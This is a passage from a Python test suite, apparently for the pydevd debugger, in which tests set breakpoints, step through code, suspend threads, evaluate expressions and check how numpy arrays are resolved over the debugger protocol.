hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('step over')
writer.write_step_over(thread_id)
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.log.append('asserting')
try:
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_case_2(case_setup):
with case_setup.test_file('_debugger_case2.py') as writer:
writer.write_add_breakpoint(3, 'Call4') # seq = 3
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_add_breakpoint(14, 'Call2')
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.parametrize(
'skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception',
(
[['NameError'], []],
[['NameError'], ['NameError']],
[[], []], # Empty means it'll suspend/print in any exception
[[], ['NameError']],
[['ValueError'], ['Exception']],
[['Exception'], ['ValueError']], # ValueError will also suspend/print since we're dealing with a NameError
)
)
def test_case_breakpoint_condition_exc(case_setup, skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception):
msgs_in_stderr = (
'Error while evaluating expression: i > 5',
'Traceback (most recent call last):',
'File "<string>", line 1, in <module>',
)
# It could be one or the other in PyPy depending on the version.
msgs_one_in_stderr = (
"NameError: name 'i' is not defined",
"global name 'i' is not defined",
)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
for msg in msgs_in_stderr + msgs_one_in_stderr:
if msg in line:
return True
return False
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if skip_print_breakpoint_exception in ([], ['ValueError']):
for msg in msgs_in_stderr:
assert msg in stderr
for msg in msgs_one_in_stderr:
if msg in stderr:
break
else:
raise AssertionError('Did not find any of: %s in stderr: %s' % (
msgs_one_in_stderr, stderr))
else:
for msg in msgs_in_stderr + msgs_one_in_stderr:
assert msg not in stderr
with case_setup.test_file('_debugger_case_breakpoint_condition_exc.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
original_additional_output_checks = writer.additional_output_checks
writer.additional_output_checks = additional_output_checks
writer.write_suspend_on_breakpoint_exception(skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception)
breakpoint_id = writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'Call', condition='i > 5')
writer.write_make_initial_run()
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
if IS_JYTHON:
# Jython will break twice.
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
msg = writer.wait_for_message(CMD_GET_FRAME)
name_to_value = {}
for var in msg.var:
name_to_value[var['name']] = var['value']
assert name_to_value == {'i': 'int: 6', 'last_i': 'int: 6'}
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_double_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_remove_breakpoint(breakpoint_id) # Double-remove (just check that we don't have an error).
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test fails once in a while due to timing issues on IronPython, so, skipping it.')
def test_case_3(case_setup):
with case_setup.test_file('_debugger_case3.py') as writer:
writer.write_make_initial_run()
time.sleep(.5)
breakpoint_id = writer.write_add_breakpoint(4, '')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_suspend_thread(case_setup):
with case_setup.test_file('_debugger_case4.py') as writer:
writer.write_make_initial_run()
thread_id = writer.wait_for_new_thread()
writer.write_suspend_thread(thread_id)
while True:
hit = writer.wait_for_breakpoint_hit((REASON_THREAD_SUSPEND, REASON_STOP_ON_BREAKPOINT))
if hit.name == 'sleep':
break # Ok, broke on 'sleep'.
else:
# i.e.: if it doesn't hit on 'sleep', release and pause again.
writer.write_run_thread(thread_id)
time.sleep(.1)
writer.write_suspend_thread(thread_id)
assert hit.thread_id == thread_id
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'exit_while_loop()')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop()" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier),
'<var name="exit_while_loop()" type="str" value="str: ok"', # jython
]
])
writer.write_run_thread(thread_id)
writer.finished_ok = True
# Jython has a weird behavior: it seems it has fine-grained locking so that when
# we're inside the tracing other threads don't run (so, we can have only one
# thread paused in the debugger).
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
def test_case_suspend_all_thread(case_setup):
with case_setup.test_file('_debugger_case_suspend_all.py') as writer:
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread() # Main thread
thread_id1 = writer.wait_for_new_thread() # Thread 1
thread_id2 = writer.wait_for_new_thread() # Thread 2
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
# Wait for 2 threads to be suspended (the main thread is already in a join, so, it can't actually
# break out of it while others don't proceed).
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit0.thread_id, hit0.frame_id, 'LOCAL'), 'exit_while_loop(1)')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop(1)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier)
]
])
writer.write_evaluate_expression('%s\t%s\t%s' % (hit1.thread_id, hit1.frame_id, 'LOCAL'), 'exit_while_loop(2)')
writer.wait_for_evaluation('<var name="exit_while_loop(2)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def test_case_5(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
breakpoint_id = writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_6(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
assert 13 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test is flaky on Jython, so, skipping it.')
def test_case_7(case_setup):
# This test checks that we start without variables and at each step a new var is created, but on ironpython,
# the variables exist all at once (with None values), so, we can't test it properly.
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars('<xml></xml>') # no vars at this point
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int', # jython
]
])
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" qualifier="{0}" value="int%253A 20" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" value="int%253A 20" />%0A', # jython
]
])
writer.write_run_thread(hit.thread_id)
assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_8(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=15)
writer.write_run_thread(hit.thread_id)
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_9(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
# Note: no active exception (should not give an error and should return no
# exception details as there's no exception).
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(CMD_GET_EXCEPTION_DETAILS)
assert msg.thread['id'] == hit.thread_id
assert not hasattr(msg.thread, 'frames') # No frames should be found.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_10(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'None') # None or Method should make hit.
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 11 == writer._sequence, 'Expected 11. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_11(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'Method1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=2)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=3)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=12) # Reverts to step in
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=13)
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=18) # Reverts to step in
assert hit.name == '<module>'
# Finish with a step over
writer.write_step_over(hit.thread_id)
if IS_JYTHON:
writer.write_run_thread(hit.thread_id)
else:
# Finish with a step over
writer.write_step_over(hit.thread_id)
writer.finished_ok = True
def test_case_12(case_setup):
# Note: In CPython we now ignore the function names, so, we'll stop at the breakpoint in line 2
# regardless of the function name (we decide whether to stop in a line or not through the function
# lines).
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, '') # Should not be hit: setting empty function (not None) should only hit global.
writer.write_add_breakpoint(6, 'Method1a')
writer.write_add_breakpoint(11, 'Method2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=11)
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=6 if IS_JYTHON else 2) # not a return (it stopped in the other breakpoint)
writer.write_run_thread(hit.thread_id)
if not IS_JYTHON:
hit = writer.wait_for_breakpoint_hit('111', line=6)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='Failing on IronPython (needs to be investigated).')
def test_case_13(case_setup):
with case_setup.test_file('_debugger_case13.py') as writer:
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydevd_bundle' not found while handling absolute import",
"import __builtin__"):
if expected in line:
return True
return False
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(35, 'main')
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=25)
# Should go inside setter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=21)
# Should go inside getter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
# Disable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;true;true;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=39)
# Should Skip step into properties setter
# Enable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=8)
# Should go inside getter method
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_14(case_setup):
# Interactive Debug Console
with case_setup.test_file('_debugger_case14.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.thread_id, '%s not valid.' % hit.thread_id
assert hit.frame_id, '%s not valid.' % hit.frame_id
# Access some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Black%27'])
assert 7 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
# Change some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color='Red'" % (hit.thread_id, hit.frame_id))
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Red%27'])
assert 11 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
# Iterate some loop
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tfor i in range(3):" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t print(i)" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(
[
'<xml><more>False</more><output message="0"></output><output message="1"></output><output message="2"></output></xml>' ]
)
assert 17 == writer._sequence, 'Expected 19. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_15(case_setup):
with case_setup.test_file('_debugger_case15.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# Access some variable
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXEC", "f=lambda x: 'val=%s' % x", "f")
writer.wait_for_custom_operation('val=Black')
assert 7 == writer._sequence, 'Expected 7. Had: %s' % writer._sequence
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXECFILE", debugger_unittest._get_debugger_test_file('_debugger_case15_execfile.py'), "f")
writer.wait_for_custom_operation('val=Black')
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_16_resolve_numpy_array(case_setup):
# numpy.ndarray resolver
try:
import numpy
except ImportError:
pytest.skip('numpy not available')
with case_setup.test_file('_debugger_case16.py') as writer:
writer.write_add_breakpoint(9, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# In this test we check that the three arrays of different shapes, sizes and types
# are all resolved properly as ndarrays.
# First pass check is that we have all three expected variables defined
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_multiple_vars((
(
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j 8.%252B1.j%250A 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j 16.%252B1.j 17.%252B1.j%250A 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j 24.%252B1.j 25.%252B1.j 26.%252B1.j%250A 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j%250A 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j%250A 45.%252B1.j 46.%252B1.j 47.%252B1.j 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j%250A 54.%252B1.j 55.%252B1.j 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j%250A 63.%252B1.j 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j 80.%252B1.j%250A 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j 88.%252B1.j 89.%252B1.j%250A 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j 96.%252B1.j 97.%252B1.j 98.%252B1.j%250A 99.%252B1.j%255D" isContainer="True" />',
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j%250A 8.%252B1.j 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j%250A 16.%252B1.j 17.%252B1.j 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j%250A 24.%252B1.j 25.%252B1.j 26.%252B1.j 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j%250A 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j%250A 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j 45.%252B1.j 46.%252B1.j 47.%252B1.j%250A 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j 54.%252B1.j 55.%252B1.j%250A 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j 63.%252B1.j%250A 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j%250A 80.%252B1.j 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j%250A 88.%252B1.j 89.%252B1.j 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j%250A 96.%252B1.j 97.%252B1.j 98.%252B1.j 99.%252B1.j%255D" isContainer="True" />'
),
(
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ... 9997 9998 9999%255D%250A %255B10000 10001 10002 ... 19997 19998 19999%255D%250A %255B20000 20001 20002 ... 29997 29998 29999%255D%250A ...%250A %255B70000 70001 70002 ... 79997 79998 79999%255D%250A %255B80000 80001 80002 ... 89997 89998 89999%255D%250A %255B90000 90001 90002 ... 99997 99998 99999%255D%255D" isContainer="True" />',
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ...%252C 9997 9998 9999%255D%250A %255B10000 10001 10002 ...%252C 19997 19998 19999%255D%250A %255B20000 20001 20002 ...%252C 29997 29998 29999%255D%250A ...%252C %250A %255B70000 70001 70002 ...%252C 79997 79998 79999%255D%250A %255B80000 80001 80002 ...%252C 89997 89998 89999%255D%250A %255B90000 90001 90002 ...%252C 99997 99998 99999%255D%255D" isContainer="True" />'
),
# Any of the ones below will do.
(
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ... 9999997 9999998 9999999%255D" isContainer="True" />',
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ...%252C 9999997 9999998 9999999%255D" isContainer="True" />'
)
))
# For each variable, check each of the resolved (meta data) attributes...
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray')
writer.wait_for_multiple_vars((
'<var name="min" type="complex128"',
'<var name="max" type="complex128"',
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
# ...and check that the internals are resolved properly
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray')
# isContainer could be true on some numpy versions, so, we only check for the var begin.
writer.wait_for_multiple_vars((
[
'<var name="min" type="int64" qualifier="numpy" value="int64%253A 0"',
'<var name="min" type="int64" qualifier="numpy" value="int64%3A 0"',
'<var name="size" type="int" qualifier="{0}" value="int%3A 100000"'.format(builtin_qualifier),
],
[
'<var name="max" type="int64" qualifier="numpy" value="int64%253A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
'<var name="max" type="int64" qualifier="numpy" value="int64%3A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"'
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
# this one is different because it crosses the magic threshold where we don't calculate
# the min/max
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray')
writer.wait_for_var((
[
'<var name="min" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
],
[
'<var name="max" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17(case_setup):
# Check dont trace
with case_setup.test_file('_debugger_case17.py') as writer:
writer.write_enable_dont_trace(True)
writer.write_add_breakpoint(27, 'main')
writer.write_add_breakpoint(29, 'main')
writer.write_add_breakpoint(31, 'main')
writer.write_add_breakpoint(33, 'main')
writer.write_make_initial_run()
for _i in range(4):
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=2)
# Should Skip step into properties setter
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17a(case_setup):
# Check dont trace return
with case_setup.test_file('_debugger_case17a.py') as writer:
writer.write_enable_dont_trace(True)
break1_line = writer.get_line_index_with_content('break 1 here')
writer.write_add_breakpoint(break1_line, 'm1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=break1_line)
writer.write_step_in(hit.thread_id)
break2_line = writer.get_line_index_with_content('break 2 here')
hit = writer.wait_for_breakpoint_hit('107', line=break2_line)
# Should Skip step into properties setter
assert hit.name == 'm3'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_18(case_setup):
# change local variable
if IS_IRONPYTHON or IS_JYTHON:
pytest.skip('Unsupported assign to local')
with case_setup.test_file('_debugger_case18.py') as writer:
writer.write_add_breakpoint(5, 'm2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'a', '40')
writer.wait_for_var('<xml><var name="" type="int" qualifier="{0}" value="int%253A 40" />%0A</xml>'.format(builtin_qualifier,))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_19(case_setup):
# Check evaluate '__' attributes
with case_setup.test_file('_debugger_case19.py') as writer:
writer.write_add_breakpoint(8, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=8)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a.__var')
writer.wait_for_evaluation([
[
'<var name="a.__var" type="int" qualifier="{0}" value="int'.format(builtin_qualifier),
'<var name="a.__var" type="int" value="int', # jython
]
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Monkey-patching related to starting threads not done on Jython.')
def test_case_20(case_setup):
# Check that we were notified of threads creation before they started to run
